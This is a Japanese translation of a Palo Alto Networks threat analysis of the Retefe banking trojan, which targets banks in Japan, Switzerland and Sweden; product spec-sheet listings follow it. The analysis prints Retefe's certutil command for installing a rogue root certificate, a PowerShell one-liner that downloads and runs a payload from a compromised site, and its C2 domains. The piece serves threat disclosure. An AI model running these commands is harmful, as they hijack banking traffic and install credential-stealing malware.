*本内容は、2015年8月20日(米国時間)に米国Palo Alto Networksが発表した報道資料の抄訳版です。

Retefeとは現在インターネット上で最大の金融組織を狙う標的型トロイの木馬の一つです。ZeusやCitadelといった他のマルウェアが世界中の銀行のウェブサイトを標的とした攻撃に多く採用されているのに対して、Retefeは一貫して日本、スウェーデン、スイスの銀行への標的型攻撃に使用されています。

パロアルトネットワークスの提供するサイバー脅威インテリジェンスサービス「AutoFocus」では、8月20日までの直近2週間で西ヨーロッパと日本の組織をターゲットとするRetefeを配信する電子メールが急増していることが検知されました。

図1: 最近のRetefeトロイの木馬の受信者を示すAutoFocusマップ

(Destination Countries = 宛先の国)

攻撃用メールでは、標的とする国に合わせてさまざまな「注文」や「領収書」に関する件名で、より重要視されるように日付のあるファイル名を使用しています。電子メールの差出人はほとんどの場合、近隣の家電量販店を名乗っています。日本では、国内大手ECサイトを装ったメールのケースが確認されています。

図2: 日本の標的宛に送られたRetefe のサンプル
 

世界規模ではRetefeは非常に小さな脅威ですが、それは設計によるものと考えられます。このマルウェアは、不正行為を働く攻撃者を支援するために、日本、スイス、スウェーデンの金融機関宛のコネクションをハイジャックします。最近の一連の攻撃で配信された本マルウェアはSmoke Loaderと呼ばれるトロイの木馬もダウンロードします。これはモジュール型のバックドアであり認証情報を搾取して別のマルウェアをインストールさせることが可能です。

Retefe の動作

ほとんどの金融組織を狙うトロイの木馬はSSLで暗号化される前にログイン情報をキャプチャするようウェブブラウザを攻撃し金融機関のWebサーバーに送信しますが、Retefeは異なります。RetefeはWindows PowerShellを使用してシステムに新規のルート証明書をインストールし、標的となる金融機関のウェブサイトへ、トラフィックを再ルーティングするプロキシ設定を行う一連のコマンドを実行します。

Retefeトロイの木馬はルート証明書をディスクに書き込み、以下のコマンドを使用してシステムにインストールします。

certutil -addstore -f -user ROOT ProgramData\cert512121.der

Retefeはこれまで多くの証明書を使用していますが、最新のものでは Thawte社 (thawte, Inc.) の偽装証明書が使用されています。

図3:  Retefeによりインストールされる偽の “thawte, Inc.” ルート証明書
 
証明書をインストールすると、RetefeはJavaScriptコードを取得するためにHTTP経由でサーバーにリクエストを送信します。このコードによりWebブラウジングのシステムプロキシは再設定され、攻撃者によって制御されるサーバーを中継して特定金融機関ドメインのトラフィックをルーティングします。このプロキシサーバーはトラフィックに対して中間者攻撃を行い、当該リクエストを復号化してデータを再暗号化する前に変更が行われ、金融機関に転送します。信頼すべきではないウェブサイトにアクセスしているという通知をユーザーが受けることを防ぐため、Retefeは新しいルート証明書をインストールします。

Retefeのコマンドアンドコントロールサーバーは感染したホストが日本、スイス、スウェーデンにある場合のみ、このプロキシ設定コードを返送するようです。Retefeは頻繁にコマンドアンドコントロールサーバーを変更しますが、最新の攻撃キャンペーンでは以下を含むVPNサービスを模倣した名前を使っています。

  • securevpnalarm.net
  • hsshvpn.net

証明書のインストールおよびシステムプロキシの再設定後、Retefeはもう一つのPowerShellコマンドを使用して別の実行ファイルをダウンロードします。多くの場合、このマルウェアは感染システムから認証情報を搾取可能なモジュラー構造のバックドア型トロイの木馬であるSmoke Loaderの亜種と確認されています。

Retefeの亜種は複数のURLから追加マルウェアをダウンロードしますが、ほとんどの場合その実行ファイルを保持するサーバーは標的とされる国にホスティングされる乗っ取られたウェブサイトです。

powershell.exe -Command (New-Object System.Net.WebClient).DownloadFile(‘http://www.schweizerhof-wetzikon[.]ch/images/rtucrtmirumctrutbitueriumxe/ivotyimoyctorieotcmir.exe’ ‘ProgramData\Microsoft-KB512118.exe’);(New-Object -com Shell.Application).ShellExecute(‘ProgramData\Microsoft-KB512118.exe’);

Retefeによる攻撃の首謀者は、対象の3か国以外のシステムへの感染を収益につなげるためSmoke Loaderのダウンロードを始めたのではないかと思われます。

まとめ

Retefeは世界的には小規模な拡散ですが、その攻撃はほんの数か国におけるオンラインバンキングの顧客が特異的に標的化されています。Retefeの最新の一連の攻撃では追加マルウェアをインストールするために感染端末を利用し始めており、他の国のユーザーも脅威の対象とする可能性が示されます。

パロアルトネットワークスの脅威インテリジェンスクラウド「WildFire」は、RetefeおよびSmoke Loaderのサンプルを悪意あるものとして識別します。また「AutoFocus」ユーザーはSmoke LoaderおよびRetefeのタグを使用してこれらサンプルを識別することが可能です。


 

パロアルトネットワークス管理者ガイド日本語版

このガイドで、パロアルトネットワークスのファイアウォールのWeb管理画面の使用方法を説明します。対象は設置、運用管理、メンテナンスを行うシステム管理者向けです。 ※このページで提供する管理者ガイドが最新版でない可能性があります。最新版に関しては、製品をご購入された販売代理店にご相談ください。  
  • 5
  • 18198

PA-3200 Series スペックシート

パロアルトネットワークス® PA-3200 Series の次世代ファイアウォールは、PA-3260、PA-3250、およびPA-3220 で構成されています。これらのモデルはすべて高速の インターネット ゲートウェイでの導入を目的としたものです。PA-3200 Seriesはネットワーキング、セキュリティ、脅威防御および管理のための専用処理およびメモリ を使用して、暗号化トラフィックを含むすべてのトラフィックを保護します。
  • 0
  • 4343

PA-800 Series

主なセキュリティ機能: すべてのアプリケーションをすべてのポートで常時識別 • 使用されているポートや暗号化(SSLまたはSSH)、セキュリティの回避技術に関わらず、アプリケーションを識別します。 • 許可、拒否、スケジュール、スキャン、帯域制御の適用などのセキュリティ ポリシー決定の要素として、ポートではなくアプリケーションを使用します。 • 不明なアプリケーションを、ポリシー制御、脅威のフォレンジック、またはApp-ID™アプリケーション識別テクノロジの開発が行えるよう分類します。
  • 1
  • 11873

PA-3000 Series スペックシート

PA-3000シリーズの主な機能、パフォーマンスと容量、および仕様。
  • 1
  • 9545

PA-5200 Series

パロアルトネットワークス® PA-5200 Seriesの次世代ファイアウォール アプライアンスは、PA-5260、PA-5250、PA-5220から構成されており、高速データセンター、インターネット ゲートウェイ、およびサービス プロバイダでの導入に適しています。PA-5200シリーズは、ネットワーキング、セキュリティ、脅威からの防御と管理の重要な機能領域専用の処理機能とメモリを使用して、最大80Gbpsのスループットを提供します。
  • 0
  • 6158